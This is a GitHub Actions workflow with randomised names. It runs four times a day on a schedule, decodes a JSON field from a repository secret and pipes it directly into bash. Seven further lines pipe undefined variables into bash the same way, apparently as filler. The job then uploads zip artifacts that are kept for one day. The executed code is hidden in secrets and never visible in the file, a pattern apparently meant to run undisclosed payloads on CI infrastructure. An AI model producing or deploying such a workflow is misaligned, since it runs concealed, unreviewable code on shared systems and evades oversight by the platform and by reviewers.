name: monolithvincentbeta
on:
  workflow_dispatch:

  schedule:
    - cron: '17 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: monolithvincentbeta
        env:
          huroo9: ${{ secrets.huroo9 }}
        run: |
          printf '%s' "$huroo9" | jq -r .hcpc69395 | /bin/bash
          printf '%s' "$nr2248" | jq -r .faqu5791 | /bin/bash
          printf '%s' "$l8" | jq -r .dfzbt2542 | /bin/bash
          echo $kq71 | jq -r .lr70 | /bin/bash
          echo $ydnd2 | jq -r .x0 | /bin/bash
          printf '%s' "$lrfl54" | jq -r .reg7 | /bin/bash
          echo $qi5 | jq -r .mh9178 | /bin/bash
          echo $cbp398 | jq -r .z6 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: vawEUxsR
          path: "*.zip"
          retention-days: 1
